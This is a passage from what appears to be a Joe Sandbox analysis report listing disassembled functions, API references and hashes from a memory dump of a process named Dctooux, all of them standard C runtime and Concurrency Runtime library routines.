Part of subcall function 00A77D6D: Concurrency::details::SchedulerBase::FoundAvailableVirtualProcessor.LIBCONCRT ref: 00A77D92
Part of subcall function 00A77D6D: Concurrency::details::VirtualProcessor::ClaimTicket::ExerciseWith.LIBCMT ref: 00A77DB5

Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00A78D7A
Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 00A78D86

Part of subcall function 00A77108: InterlockedPopEntrySList.KERNEL32(?), ref: 00A77191
Part of subcall function 00A77108: Concurrency::details::SchedulerBase::AddContext.LIBCONCRT ref: 00A771C0
Part of subcall function 00A77108: Concurrency::details::InternalContextBase::SpinUntilBlocked.LIBCMT ref: 00A771CE

Concurrency::details::SchedulerBase::GetNextSchedulingRing.LIBCMT ref: 00A78DD2
Concurrency::location::_Assign.LIBCMT ref: 00A78DF3
Concurrency::details::SchedulerBase::StartupVirtualProcessor.LIBCONCRT ref: 00A78DFB
Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 00A78E0D
Concurrency::details::SchedulerBase::ChangeThrottlingTimer.LIBCONCRT ref: 00A78E3D

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Scheduler$Context$Throttling$InternalTimeVirtual$Processor$AssignAvailableBlockedChangeClaimConcurrency::location::_EntryExerciseFoundH_prolog3_catchInterlockedListNextNotifyProcessor::RingSchedulingSpinStartupThrottledTicket::TimerUntilWith
String ID:
API String ID: 2678502038-0
Opcode ID: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction ID: 27531d94d48d4218921b078f75a2fe4b409925b37bf4ebb9f18e7d60b934f6c6
Opcode Fuzzy Hash: e5f6ca3cbb7375102534bb9ce9f7030bf6bb821756b29020f3f95bdaa7addcda
Instruction Fuzzy Hash: 2D313630B84251AFCF26AB784D9A6FE7BB99F51704F04C1A9D44DD7282EF288C458391

Uniqueness

Uniqueness Score: -1.00%

Function 00A81DD5 Relevance: 13.6, APIs: 9, Instructions: 69threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A81DEB
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00A770FE,?), ref: 00A81DFD
GetCurrentThread.KERNEL32 ref: 00A81E05
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,00A770FE,?), ref: 00A81E0D
DuplicateHandle.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000002,?,?,?,?,?,?,00A770FE,?), ref: 00A81E26
Concurrency::details::RegisterAsyncWaitAndLoadLibrary.LIBCONCRT ref: 00A81E47

Part of subcall function 00A71661: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00A7167B

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00A770FE,?), ref: 00A81E59
GetLastError.KERNEL32(?,?,?,?,?,00A770FE,?), ref: 00A81E84
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00A81E9A

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Current$Concurrency::details::ErrorLastLibraryLoadProcessThread$AsyncConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateHandleReferenceRegisterWait
String ID:
API String ID: 1293880212-0
Opcode ID: 92a2eeb121cff88ebac181b058ccf3f3387eb143cc6bb6919bc2ae32838597d4
Instruction ID: cc882bc897335551c77ad34e2d86df4be0cad11ea40e4c0ba3e1e5e3810c3527
Opcode Fuzzy Hash: 92a2eeb121cff88ebac181b058ccf3f3387eb143cc6bb6919bc2ae32838597d4
Instruction Fuzzy Hash: FD11B475600306ABC710FBB89D4AFAB7BACAF46741F144535FD49DA292EB70C8128772

Uniqueness

Uniqueness Score: -1.00%

Function 00A8FE6E Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 00A8FE98
_free.LIBCMT ref: 00A8FF71
_free.LIBCMT ref: 00A8FF9E

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 1b86ed0c3a98b98715c032c301ebdc11a3d6be87b6c943f4cd25b6f20b092471
Instruction ID: 8578788d1280cd54f11e691ccc962ee21a8853b3f93e3cec9655d6afcedc98d1
Opcode Fuzzy Hash: 1b86ed0c3a98b98715c032c301ebdc11a3d6be87b6c943f4cd25b6f20b092471
Instruction Fuzzy Hash: 7751B571E04206AFDF20BFB89981F6E7BF8AF01360F14426DE91497292EA75CD41DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A85C90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00A85CC7
___except_validate_context_record.LIBVCRUNTIME ref: 00A85CCF
_ValidateLocalCookies.LIBCMT ref: 00A85D58
__IsNonwritableInCurrentImage.LIBCMT ref: 00A85D83
_ValidateLocalCookies.LIBCMT ref: 00A85DD8

Strings

csm, xrefs: 00A85D6D

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 3345e3ee6ee05779f7e06b73a88ab9f5ca4dd0f70417a8f4cb3d3c806e101651
Instruction ID: d27a3b1f01b32d927302dac3d0b6b75da5a0edef926968d0755a222bafed0aa2
Opcode Fuzzy Hash: 3345e3ee6ee05779f7e06b73a88ab9f5ca4dd0f70417a8f4cb3d3c806e101651
Instruction Fuzzy Hash: FE418E34E00609ABCF10FF78C888A9EBBB5FF49314F148195EC14AB292D771D916CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A82F76 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 104threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00A82F8F

Part of subcall function 00A8325E: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00A82CD7), ref: 00A8326E

Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 00A82FA4
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A82FB3
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A83077

Strings

switchState, xrefs: 00A82FAB
pContext, xrefs: 00A8306F

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::std::invalid_argument::invalid_argument$ExecutionFreeIdleObjectProcessorProxy::ResetRoot::SingleSuspendThreadVirtualWait
String ID: pContext$switchState
API String ID: 1312548968-2660820399
Opcode ID: adeca87ca58be7b21a10ea435020c228b834fcf01ed65340235fdaaa0e96e6d7
Instruction ID: e694e48665083b80764a4d6d547490bd88b6e255b2115dcad61e17080a1d666a
Opcode Fuzzy Hash: adeca87ca58be7b21a10ea435020c228b834fcf01ed65340235fdaaa0e96e6d7
Instruction Fuzzy Hash: A731D676A00304AFCF04FF68C981AAD73B9BF54710F204469ED15AB282EB71EE05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A7FBFF Relevance: 10.6, APIs: 7, Instructions: 102COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 00A7FC27

Part of subcall function 00A7F994: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00A7F9C7
Part of subcall function 00A7F994: Concurrency::details::VirtualProcessor::Deactivate.LIBCONCRT ref: 00A7F9E9

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A7FCA4
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00A7FCB0
Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 00A7FCBF
Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 00A7FCC9
Concurrency::location::_Assign.LIBCMT ref: 00A7FCFD
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00A7FD05

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::$Context$Virtual$DeactivateGroupInternalProcessorProcessor::ScheduleSchedulerSegment$ActiveAssignCommitConcurrency::location::_EventPointsReclaimReleaseRunnableSafeTraceTrigger
String ID:
API String ID: 1924466884-0
Opcode ID: ec9ad7a833d03d65eb186c466ae352160fbdd81f744dd8b37e8f0381d6b0c7ea
Instruction ID: c358f59af8abbc78b51268a39d187aa6811a567fa96b111f7f72d6b4afbd2ade
Opcode Fuzzy Hash: ec9ad7a833d03d65eb186c466ae352160fbdd81f744dd8b37e8f0381d6b0c7ea
Instruction Fuzzy Hash: E2411935A002089FCF05EF64C894BADB7B5BF49314F54C0A9ED599B286DB34AA41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A8C55D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 00A8C5C8
api-ms-, xrefs: 00A8C5B4

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: 264b05d1c7f691efa5cb57f0c1d46bc6d0b976c7195b935743faf7e80d620238
Instruction ID: 4e2ca8b8c3654359837e4e9c686063a9ff8e6f74b4f3e8f5142fa5d1464c15cb
Opcode Fuzzy Hash: 264b05d1c7f691efa5cb57f0c1d46bc6d0b976c7195b935743faf7e80d620238
Instruction Fuzzy Hash: D721C371A41211BBCF26AB689C44B6A3768AF05BB0F251530E805B72D1E730ED008FF0

Uniqueness

Uniqueness Score: -1.00%

Function 00A904BB Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00A90483: _free.LIBCMT ref: 00A904A8

_free.LIBCMT ref: 00A90509

Part of subcall function 00A8C1D5: HeapFree.KERNEL32(00000000,00000000,?,00A904AD,?,00000000,?,8B18EC83,?,00A904D4,?,00000007,?,?,00A908D6,?), ref: 00A8C1EB
Part of subcall function 00A8C1D5: GetLastError.KERNEL32(?,?,00A904AD,?,00000000,?,8B18EC83,?,00A904D4,?,00000007,?,?,00A908D6,?,?), ref: 00A8C1FD

_free.LIBCMT ref: 00A90514
_free.LIBCMT ref: 00A9051F
_free.LIBCMT ref: 00A90573
_free.LIBCMT ref: 00A9057E
_free.LIBCMT ref: 00A90589
_free.LIBCMT ref: 00A90594

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction ID: c9f0a74c74701ee5a8b3bdd37384d0b4857ce40c232e2a233a3bd3f6820cc836
Opcode Fuzzy Hash: f2c9cbcbdea25c70db4e9b8930aae965ae4a61b9cabad425459c8f385a1b4d78
Instruction Fuzzy Hash: F1118171641B04AED920B7B0CD4BFCB7BDC5F40791F404D15BBAA6A053DA38B5049F50

Uniqueness

Uniqueness Score: -1.00%

Function 00A68090 Relevance: 9.3, APIs: 6, Instructions: 336COMMON

Download Yara Rule

APIs

Part of subcall function 00A6DAFC: mtx_do_lock.LIBCPMT ref: 00A6DB04

__Mtx_unlock.LIBCPMT ref: 00A68161
std::_Rethrow_future_exception.LIBCPMT ref: 00A681B2
std::_Rethrow_future_exception.LIBCPMT ref: 00A681C2
__Mtx_unlock.LIBCPMT ref: 00A68265
__Mtx_unlock.LIBCPMT ref: 00A6836B
__Mtx_unlock.LIBCPMT ref: 00A683A6

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Rethrow_future_exceptionstd::_$mtx_do_lock
String ID:
API String ID: 95294986-0
Opcode ID: 6efc963da9054d1dfb26725b80f128e9c1abc8210b84e8f971ef4d0df55f1e49
Instruction ID: 7e9e7d98ef2d5aa9cdfddb99d59d22389169143fe71df2a564cfd749bdef7f58
Opcode Fuzzy Hash: 6efc963da9054d1dfb26725b80f128e9c1abc8210b84e8f971ef4d0df55f1e49
Instruction Fuzzy Hash: FBC1E271E047049FDF20DFB4C945BAEBBF8AF05700F04466DE81697691EB79A908CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A9109F Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,00A58B40,00000000), ref: 00A910E7
__fassign.LIBCMT ref: 00A912C6
__fassign.LIBCMT ref: 00A912E3
WriteFile.KERNEL32(?,00A58B40,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A9132B
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00A9136B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A91417

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: 832a6293164779d5080d3788af1275b3f56886391162580f8270344aa312b15a
Instruction ID: 4eb5f39cd7d77a8990b1c9bda1e337074cf85b135ecefc7871862225eecff4db
Opcode Fuzzy Hash: 832a6293164779d5080d3788af1275b3f56886391162580f8270344aa312b15a
Instruction Fuzzy Hash: 6AD18B75E002599FCF15CFE8C9809EDBBF5AF49314F28016AE855FB252D630AD46CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A7FD2D Relevance: 9.1, APIs: 6, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 00A7FD6E
Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 00A7FD76
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00A7FDA0
Concurrency::details::ScheduleGroupSegmentBase::ReleaseInternalContext.LIBCMT ref: 00A7FDA9
Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00A7FE2C
Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00A7FE34

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Context$Base::$GroupInternalScheduleSegment$AssignAvailableConcurrency::location::_DeferredEventMakeProcessor::ReleaseRunnableSchedulerTraceVirtual
String ID:
API String ID: 3929269971-0
Opcode ID: 3505d8629c574d3979e6701d475646f4aefa4994e2d67d8480f3fbe7bd78805c
Instruction ID: 54b07e0a0268ed9257ff2e4d26ab12ea9e0000f4752734d780eb761e2cb3919e
Opcode Fuzzy Hash: 3505d8629c574d3979e6701d475646f4aefa4994e2d67d8480f3fbe7bd78805c
Instruction Fuzzy Hash: C4413E35A00619AFCF09DF68C954AADB7B5FF89310F04C169E51AAB391DB34AE01CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A702AF Relevance: 9.1, APIs: 6, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 00A7030C
Concurrency::details::WaitBlock::WaitBlock.LIBCMT ref: 00A70318
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00A70331
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00A7035F
Concurrency::Context::Block.LIBCONCRT ref: 00A70381

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Wait$BlockConcurrency::details::_Lock::_Scoped_lock$Block::Concurrency::Concurrency::details::Context::ReaderReentrantScoped_lock::_Scoped_lock::~_SpinWriter
String ID:
API String ID: 1182035702-0
Opcode ID: b5918959eede62c6a456a4bd75b6fecdd5b412ce0947503eea63e067643e04c4
Instruction ID: 8a1b634c2e76443b62c8f95914fc873a292c1ffa5d6bc7322f7ddce559d17004
Opcode Fuzzy Hash: b5918959eede62c6a456a4bd75b6fecdd5b412ce0947503eea63e067643e04c4
Instruction Fuzzy Hash: 25216B75900209CFDF24DFA4CD45AEEB7F0AF15310F20C66AE159AA1D1EBB18A44CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B476 Relevance: 9.1, APIs: 6, Instructions: 73threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::IncrementFixedCoreCount.LIBCONCRT ref: 00A7B4B9

Part of subcall function 00A7C9B0: Concurrency::details::SchedulerProxy::ToggleBorrowedState.LIBCONCRT ref: 00A7C9FF

GetCurrentThread.KERNEL32 ref: 00A7B4C3
Concurrency::details::HardwareAffinity::HardwareAffinity.LIBCMT ref: 00A7B4CF

Part of subcall function 00A717D8: Concurrency::details::platform::__GetThreadGroupAffinity.LIBCONCRT ref: 00A717EA

Part of subcall function 00A71C64: Concurrency::details::platform::__SetThreadGroupAffinity.LIBCONCRT ref: 00A71C6B

Concurrency::details::SchedulerProxy::IncrementCoreSubscription.LIBCONCRT ref: 00A7B512

Part of subcall function 00A7C962: SetEvent.KERNEL32(?,?,00A7B517,00A7C2AB,00000000,?,00000000,00A7C2AB,00000004,00A7C957,?,00000000,?,?,00000000), ref: 00A7C9A6

Concurrency::details::SchedulerProxy::AddExecutionResource.LIBCONCRT ref: 00A7B51B

Part of subcall function 00A7BF91: List.LIBCONCRT ref: 00A7BFC7

Concurrency::details::ExecutionResource::SetAsCurrent.LIBCMT ref: 00A7B52B

Memory Dump Source

Source File: 00000017.00000002.2948927756.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000017.00000002.2948818174.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949109120.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949193118.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949266831.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949323539.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2949400867.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$AffinityThread$Concurrency::details::platform::__CoreCurrentExecutionGroupHardwareIncrement$Affinity::BorrowedCountEventFixedListResourceResource::StateSubscriptionToggle
String ID:
API String ID: 318399070-0
Opcode ID: 5489f3cf40f50b4ded76c5bcc46e864fdea0fef908b61f7f6862ef501ce6a105
Instruction ID: f12875735e99d4f881c6fc0ae1f74dab7ba9ce6f75f4a55bb127fba9da10ec26
Opcode Fuzzy Hash: 5489f3cf40f50b4ded76c5bcc46e864fdea0fef908b61f7f6862ef501ce6a105
Instruction Fuzzy Hash: 5021BD71510B109FCB24EF64CA909AAF3F4FF48700700C91EE54BA7651CB34E905CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A86387 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00A8637E,00A84F3F,00A6C9A5,04AA336F,?,00000000,00A9D1C8,000000FF,?,00A5232A,?,?), ref: 00A86395
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A863A3
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A863BC
SetLastError.KERNEL32(00000000,?,00A8637E,00A84F3F,00A6C9A5,04AA336F,?,00000000,00A9D1C8,000000FF,?,00A5232A,?,?), ref: 00A8640E

Memory Dump Source

